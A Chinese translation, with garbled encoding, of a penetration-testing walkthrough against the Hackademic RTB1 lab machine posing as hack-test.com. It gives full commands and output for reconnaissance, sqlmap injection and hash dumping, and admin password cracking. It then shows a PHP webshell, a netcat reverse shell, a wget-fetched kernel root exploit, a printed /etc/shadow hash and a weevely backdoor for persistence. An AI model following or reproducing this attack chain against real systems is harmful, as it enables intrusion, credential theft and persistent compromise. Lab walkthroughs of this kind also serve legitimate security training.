問題的答案看起來不那么確定����,顯而易見的是黑掉一個(gè)站點(diǎn)有很多種方法�����。在這篇文章�,我們的目標(biāo)是要給大家展示一下黑客是如何鎖定并黑掉一個(gè)目標(biāo)站點(diǎn)的�����!
讓我們來看看目標(biāo)站點(diǎn):hack-test.com
先ping下站點(diǎn)所在服務(wù)器的IP:
現(xiàn)在我們有了目標(biāo)站點(diǎn)所在服務(wù)器的IP了 — 173.236.138.113
然后我們可以找找同個(gè)IP上的其他站點(diǎn)(旁站:sameip.org):
Same IP 26 sites hosted on IP Address 173.236.138.113
| ID |
Domain |
Site Link |
| 1 |
hijackthisforum.com |
hijackthisforum.com |
| 2 |
sportforum.net |
sportforum.net |
| 3 |
freeonlinesudoku.net |
freeonlinesudoku.net |
| 4 |
cosplayhell.com |
cosplayhell.com |
| 5 |
videogamenews.org |
videogamenews.org |
| 6 |
gametour.com |
gametour.com |
| 7 |
qualitypetsitting.net |
qualitypetsitting.net |
| 8 |
brendanichols.com |
brendanichols.com |
| 9 |
8ez.com |
8ez.com |
| 10 |
hack-test.com |
hack-test.com |
| 11 |
kisax.com |
kisax.com |
| 12 |
paisans.com |
paisans.com |
| 13 |
mghz.com |
mghz.com |
| 14 |
debateful.com |
debateful.com |
| 15 |
jazzygoodtimes.com |
jazzygoodtimes.com |
| 16 |
fruny.com |
fruny.com |
| 17 |
vbum.com |
vbum.com |
| 18 |
wuckie.com |
wuckie.com |
| 19 |
force5inc.com |
force5inc.com |
| 20 |
virushero.com |
virushero.com |
| 21 |
twincitiesbusinesspeernetwork.com |
twincitiesbusinesspeernetwork.com |
| 22 |
jennieko.com |
jennieko.com |
| 23 |
davereedy.com |
davereedy.com |
| 24 |
joygarrido.com |
joygarrido.com |
| 25 |
prismapp.com |
prismapp.com |
| 26 |
utiligolf.com |
utiligolf.com |
總計(jì)有26個(gè)站點(diǎn)在[173.236.138.113]這臺(tái)服務(wù)器上���。為了黑掉目標(biāo)站點(diǎn)�����,許多黑客會(huì)把目標(biāo)站點(diǎn)同服的其他站點(diǎn)也劃入攻擊范圍內(nèi)���。但是出于學(xué)習(xí)的目的,我們今天暫且將其他站點(diǎn)放在一邊��。
我們需要更多關(guān)于目標(biāo)站點(diǎn)的信息(Ps:筆者認(rèn)為在滲透測(cè)試過程中���,這比實(shí)施測(cè)試的環(huán)節(jié)來得重要得多���。)�,他們包括:
1.DNS記錄(A���,NS,TXT����,MX)
2.WEB服務(wù)類型(IIS,APACHE���,TOMCAT)
3.域名注冊(cè)者的信息(所持有域名公司等)
4.目標(biāo)站點(diǎn)管理員(相關(guān)人員)的姓名�,電話���,郵箱和住址等
5.目標(biāo)站點(diǎn)所支持的腳本類型(PHP����,ASP����,JSP,ASP.net���,CFM)
6.目標(biāo)站點(diǎn)的操作系統(tǒng)(UNIX,LINUX,WINDOWS,SOLARIS)
7.目標(biāo)站點(diǎn)開放的端口
讓我們先來查詢相關(guān)DNS記錄吧�����,這里用的是 who.is:
目標(biāo)站點(diǎn)DNS記錄信息:
| Record |
Type |
TTL |
Priority |
Content |
| hack-test.com |
A |
4 hours |
|
173.236.138.113 () |
| hack-test.com |
SOA |
4 hours |
|
ns1.dreamhost.com. hostmaster.dreamhost.com. 2011032301 15283 1800 1814400 14400 |
| hack-test.com |
NS |
4 hours |
|
ns1.dreamhost.com |
| hack-test.com |
NS |
4 hours |
|
ns3.dreamhost.com |
| hack-test.com |
NS |
4 hours |
|
ns2.dreamhost.com |
| www.hack-test.com |
A |
4 hours |
|
173.236.138.113 () |
同時(shí)確認(rèn)WEB服務(wù)的類型:
顯而易見是Apache ,稍后我們將確定其版本:
HACK-TEST.COM SITE INFORMATION
IP: 173.236.138.113
Website Status: active
Server Type: Apache
Alexa Trend/Rank: 1 Month: 3,213,968 3 Month: 2,161,753 Page Views per Visit: 1 Month: 2.0 3 Month: 3.7
現(xiàn)在是時(shí)候來查詢目標(biāo)站點(diǎn)持有人(也許可能就是管理員)信息了:
現(xiàn)在我們有了管理員的一些相關(guān)信息了���,祭出Backtrack5中的神器 Whatweb 來確認(rèn)操作系統(tǒng)和WEB服務(wù)版本信息:
Now we found that your site is using a famous php script called WordPress, that your server os is Fedora Linux and that your web server version is (apache 2.2.15), let’s find open ports in your server.
現(xiàn)在我們知道��,目標(biāo)站點(diǎn)使用了用PHP編寫的非常出名的開源博客系統(tǒng)WordPress��,并且是跑在Fedora的Linux發(fā)行版上的����,Apache版本是2.2.15��。接下來讓我們看看目標(biāo)站點(diǎn)服務(wù)器開了哪些端口:
祭出神器Nmap
1 – 獲取目標(biāo)服務(wù)器開放的服務(wù)
root@bt:/# nmap -sV hack-test.comStarting Nmap 5.59BETA1 ( http://nmap.org ) at 2011-12-28 06:39 EETNmap scan report for hack-test.com (192.168.1.2)Host is up (0.0013s latency).Not shown: 998 filtered portsPORT STATE SERVICE VERSION22/tcp closed ssh80/tcp open http Apache httpd 2.2.15 ((Fedora))MAC Address: 00:0C:29:01:8A:4D (VMware)Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .Nmap done: 1 IP address (1 host up) scanned in 11.56 seconds
2 – 獲取目標(biāo)服務(wù)器操作系統(tǒng)
root@bt:/# nmap -O hack-test.com Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2011-12-28 06:40 EETNmap scan report for hack-test.com (192.168.1.2)Host is up (0.00079s latency).Not shown: 998 filtered portsPORT STATE SERVICE22/tcp closed ssh 80/tcp open httpMAC Address: 00:0C:29:01:8A:4D (VMware)Device type: general purposeRunning: Linux 2.6.XOS details: Linux 2.6.22 (Fedora Core 6)Network Distance: 1 hop OS detection performed. Please report any incorrect results at http://nmap.org/submit/ .Nmap done: 1 IP address (1 host up) scanned in 7.42 seconds
啊哦�!~只開了80,而且是 Fedora Core 6 Linux內(nèi)核版本為2.6.22
現(xiàn)在我們已經(jīng)收集了很多關(guān)于目標(biāo)站點(diǎn)的重要信息了�。讓我們掃掃他的漏洞吧。(Sql injection – Blind sql injection – LFI – RFI – XSS – CSRF,等等.)
讓我們先試試 Nakto.pl 來掃掃�,沒準(zhǔn)能搞出點(diǎn)漏洞來
root@bt:/pentest/web/nikto# perl nikto.pl -h http://hack-test.com
- Nikto v2.1.4
—————————————————————————
+ Target IP: 192.168.1.2 + Target Hostname: hack-test.com + Target Port: 80 + Start Time: 2011-12-29 06:50:03
—————————————————————————
+ Server: Apache/2.2.15 (Fedora) + ETag header found on server, inode: 12748, size: 1475, mtime: 0x4996d177f5c3b + Apache/2.2.15 appears to be outdated (current is at least Apache/2.2.17). Apache 1.3.42 (final release) and 2.0.64 are also current. + Allowed HTTP Methods: GET, HEAD, POST, OPTIONS, TRACE + OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST + OSVDB-3268: /icons/: Directory indexing found. + OSVDB-3233: /icons/README: Apache default file found. + 6448 items checked: 1 error(s) and 6 item(s) reported on remote host + End Time: 2011-12-29 06:50:37 (34 seconds)
—————————————————————————
同時(shí)試試Wa3f(Ps:哦哇譜死的開源項(xiàng)目,很不錯(cuò)的說~)
root@bt:/pentest/web/w3af# ./w3af_gui Starting w3af, running on:Python version:2.6.5 (r265:79063, Apr 16 2010, 13:57:41)[GCC 4.4.3]GTK version: 2.20.1PyGTK version: 2.17.0 w3af - Web Application Attack and Audit FrameworkVersion: 1.2Revision: 4605Author: Andres Riancho and the w3af team.
圖形界面的掃描方式��,寫入U(xiǎn)RL即可��。
用以前給雜志社投稿的語氣說,泡杯茶的功夫�,等待掃描結(jié)束并查看結(jié)果。
你可以看到很多漏洞信息鳥~先試試SQL注入����。
url – http://hack-test.com/Hackademic_RTB1/?cat=d%27z%220 然后 Exploit it!
發(fā)現(xiàn)其他漏洞測(cè)試失敗,用SQLMap進(jìn)行脫褲吧(猜解數(shù)據(jù)庫(kù)并保存目標(biāo)站點(diǎn)相關(guān)信息到本地) Dump it!
sqlmap -u url
過一小會(huì)兒能見到如下信息
按n并回車后你可以看到
哦也~顯錯(cuò)方式的注入點(diǎn)��,而且爆出的 Mysql的版本信息
用sqlmap取得所有庫(kù)��,參數(shù) -dbs
找到三個(gè)庫(kù)
查Wordpress的庫(kù)中所有表�����,參數(shù) -D wordpress -tables
然后是列名(這里需要你自己熟悉敏感信息存在哪個(gè)表中呢)����,參數(shù) -T wp_users -columns
22個(gè)字段(列)
然后查數(shù)據(jù)�,參數(shù) -C user_login,user_pass –dump
然后解密管理員的hash,這里用的是 http://www.onlinehashcrack.com/free-hash-reverse.php
明文密碼是q1w2e3(和csdn庫(kù)的密碼排行榜有得一拼���,哈哈~)�,然后登入后臺(tái)拿webshell了�。
Get in!~
來傳個(gè)PHP的webshell吧~這里用的編輯插件拿shell的方法(見我以前寫的tips,方法有很多哦~)
牛b。保存就可以了���。然后訪問就可以看到可愛的webshell了��。
灰闊都知道���,接下來要提權(quán)了。用反彈來獲取一個(gè)交互式的shell�。
本地用nc監(jiān)聽(不得不說經(jīng)典就是經(jīng)典啊~)
連上之后
輸點(diǎn)Linux命令試試火候
id uid=48(apache) gid=489(apache) groups=489(apache)
pwd /var/www/html/Hackademic_RTB1/wp-content/plugins
uname -a Linux HackademicRTB1 2.6.31.5-127.fc12.i686 #1 SMP Sat Nov 7 21:41:45 EST 2009 i686 i686 i386 GNU/Linux
命令作用我就不翻譯了。獲取了內(nèi)核版本���,我們可以到 exploit-db.com 來尋找相關(guān)的exp進(jìn)行權(quán)限的提升����。
老外都是用wget下載的��,國(guó)內(nèi)灰闊們呢?
wget http://www.exploit-db.com/download/15285 -O roro.c--2011-12-28 00:48:01-- http://www.exploit-db.com/download/15285Resolving www.exploit-db.com... 199.27.135.111, 199.27.134.111Connecting to www.exploit-db.com|199.27.135.111|:80... connected.HTTP request sent, awaiting response... 301 Moved PermanentlyLocation: http://www.exploit-db.com/download/15285/ [following]--2011-12-28 00:48:02-- http://www.exploit-db.com/download/15285/Connecting to www.exploit-db.com|199.27.135.111|:80... connected.HTTP request sent, awaiting response... 200 OKLength: 7154 (7.0K) [application/txt]Saving to: `roro.c' 0K ...... 100% 29.7K=0.2s
代碼我不貼了�����。用gcc編譯exp gcc roro.c -o roro ��,編譯并且執(zhí)行exp�����。
./roro [*] Linux kernel >= 2.6.30 RDS socket exploit[*] by Dan Rosenberg[*] Resolving kernel addresses...[+] Resolved rds_proto_ops to 0xe09f0b20[+] Resolved rds_ioctl to 0xe09db06a[+] Resolved commit_creds to 0xc044e5f1[+] Resolved prepare_kernel_cred to 0xc044e452[*] Overwriting function pointer...[*] Linux kernel >= 2.6.30 RDS socket exploit[*] by Dan Rosenberg[*] Resolving kernel addresses...[+] Resolved rds_proto_ops to 0xe09f0b20[+] Resolved rds_ioctl to 0xe09db06a[+] Resolved commit_creds to 0xc044e5f1[+] Resolved prepare_kernel_cred to 0xc044e452[*] Overwriting function pointer...[*] Triggering payload...[*] Restoring function pointer...
淡定,敲個(gè)id試試�����,你可以發(fā)現(xiàn) root it!
現(xiàn)在可以查看shadow和passwd了~(我只截了部分)
cat /etc/shadow
root:$6$4l1OVmLPSV28eVCT$FqycC5mozZ8mqiqgfudLsHUk7R1EMU/FXw3pOcOb39LXekt9VY6HyGkXcLEO.ab9F9t7BqTdxSJvCcy.iYlcp0:14981:0:99999:7:::
我們可以使用 John the ripper 來破哈希�����。但是我們不會(huì)這么做��,通常我們會(huì)留下一個(gè)后門(權(quán)限鞏固)�,這樣就可以隨時(shí)涂掉他首頁(yè)了(hv a joke.)�����。
我們用bt5中的weevely來上傳一個(gè)帶密碼保護(hù)的PHP的webshell�。
1 – weevely的相關(guān)選項(xiàng)
root@bt:/pentest/backdoors/web/weevely# ./main.py - Weevely 0.3 - Generate and manage stealth PHP backdoors.Copyright (c) 2011-2012 Weevely DevelopersWebsite: http://code.google.com/p/weevely/ Usage: main.py [options] Options:-h, --help show this help message and exit-g, --generate Generate backdoor crypted code, requires -o and -p .-o OUTPUT, --output=OUTPUTOutput filename for generated backdoor .-c COMMAND, --command=COMMANDExecute a single command and exit, requires -u and -p.-t, --terminal Start a terminal-like session, requires -u and -p .-C CLUSTER, --cluster=CLUSTERStart in cluster mode reading items from the givefile, in the form 'label,url,password' where label isoptional.-p PASSWORD, --password=PASSWORDPassword of the encrypted backdoor . -u URL, --url=URL Remote backdoor URL .
2 – 用它來創(chuàng)建一個(gè)PHP的webshell
root@bt:/pentest/backdoors/web/weevely# ./main.py -g -o hax.php -p koko Weevely 0.3 - Generate and manage stealth PHP backdoors.Copyright (c) 2011-2012 Weevely DevelopersWebsite: http://code.google.com/p/weevely/ + Backdoor file 'hax.php' created with password 'koko'.
3 – 上傳
我們現(xiàn)在可以用weevely連接并操控他了。
測(cè)試(其實(shí)就相當(dāng)于一句話?cǎi)R差不多的..)
總結(jié):
老外的行文方式還不錯(cuò)���,很好的滲透流程�,很標(biāo)準(zhǔn)的科普文~~
域名注冊(cè)知識(shí)
虛擬主機(jī)知識(shí)
網(wǎng)站建設(shè)知識(shí)
網(wǎng)絡(luò)推廣知識(shí)
網(wǎng)絡(luò)營(yíng)銷知識(shí)
常見技術(shù)問題
QQ空間
新浪微博
開心網(wǎng)
人人網(wǎng)
